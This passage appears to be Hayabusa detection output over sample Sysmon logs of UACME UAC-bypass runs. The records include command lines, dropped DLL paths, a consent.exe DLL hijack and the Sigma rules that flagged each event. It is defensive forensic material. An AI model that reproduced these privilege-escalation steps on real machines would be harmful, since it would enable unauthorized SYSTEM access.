Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.874 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:14.372 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:14.977 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:15.664 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 
747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.721 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.753 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.853 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:16.853 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:19.888 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: 
C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:19.915 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:20.731 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3b3 | PID: 4964 | PGUID: 747F3D96-7934-5D45-0000-0010A2A40701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:21.128 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 
12:08:21.954 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:21.954 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 7324 | PGUID: 747F3D96-7935-5D45-0000-001066CA0701,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.524 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 7564 | PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.554 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 272 00000280644BC500 | LID: 0x3e7 | PID: 4192 | PGUID: 747F3D96-7937-5D45-0000-00100D290801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.555 
+00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7564 | Src PGUID: 747F3D96-7934-5D45-0000-0010CAB90701 | Tgt PID: 4192 | Tgt PGUID: 747F3D96-7937-5D45-0000-00100D290801,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:23.555 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:25.165 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:55.408 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3116 | PGUID: 747F3D96-7957-5D45-0000-00100E620A01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 37 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,high,Evas | 
PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:14.789 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.096 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\GdiPlus.dll | Process: C:\Windows\explorer.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.354 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3fb | PID: 932 | PGUID: 747F3D96-7E93-5D45-0000-0010AA622601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.364 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3796 | PGUID: 747F3D96-7E93-5D45-0000-001008652601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.779 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 37 | LID: 0x18d3b3 | PID: 6576 | PGUID: 747F3D96-7E93-5D45-0000-0010AA8A2601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:15.779 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:27.049 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2352 | PGUID: 747F3D96-7E9E-5D45-0000-001080D92601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:31:27.683 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4884 | PGUID: 747F3D96-7E92-5D45-0000-0010FF472601,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 36 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.577 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:34.875 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\MSCOREE.DLL | Process: C:\Windows\explorer.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.085 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 2740 | PGUID: 747F3D96-7EE2-5D45-0000-0010E49C2801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.137 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 400 00000280644220C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3652 | PGUID: 747F3D96-7EE2-5D45-0000-0010F19E2801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.531 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu | Process: C:\Windows\System32\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
UACME.exe 36 | LID: 0x18d3b3 | PID: 2348 | PGUID: 747F3D96-7EE3-5D45-0000-0010AFC12801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:35.531 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:36.794 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3fb | PID: 7180 | PGUID: 747F3D96-7EE4-5D45-0000-001015F72801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:36.812 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471E00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1708 | PGUID: 747F3D96-7EE4-5D45-0000-001029F92801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.160 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | Process: C:\Windows\System32\dcomcnfg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 36 | LID: 0x18d3b3 | PID: 1240 | PGUID: 747F3D96-7EE4-5D45-0000-001091122901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.184 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc | 
Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dcomcnfg.exe"" | LID: 0x18d3b3 | PID: 7636 | PGUID: 747F3D96-7EE5-5D45-0000-001076162901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:37.261 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 344 | PGUID: 747F3D96-7EE5-5D45-0000-0010B71B2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:38.640 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 5284 | PGUID: 747F3D96-7EE2-5D45-0000-00104E852801,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:49.013 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 796 | PGUID: 747F3D96-7EF1-5D45-0000-0010DDBF2901,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 12:32:49.525 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7400 | PGUID: 747F3D96-7E25-5D45-0000-0010D0AF2301,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
UACME.exe 38 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.614 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.782 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3508 | PGUID: 747F3D96-9122-5D45-0000-0010710D6101,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:26.782 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:27.060 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 398 000002806443AF40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5128 | PGUID: 747F3D96-9122-5D45-0000-001042326101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:27.356 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: huy32,wf.msc 
""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 38 | LID: 0x18d3b3 | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.101 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50105 (MSEDGEWIN10.home) | Dst: 185.199.111.153:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 4372 | PGUID: 747F3D96-9123-5D45-0000-001087596101,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Temp\fubuki.exe"" | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: huy32,wf.msc ""C:\Users\IEUser\AppData\Local\Temp\kmkze.msc"" | LID: 0x18d3b3 | PID: 3180 | PGUID: 747F3D96-9124-5D45-0000-001022926101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.424 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_38.evtx +2019-08-03 13:50:29.459 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
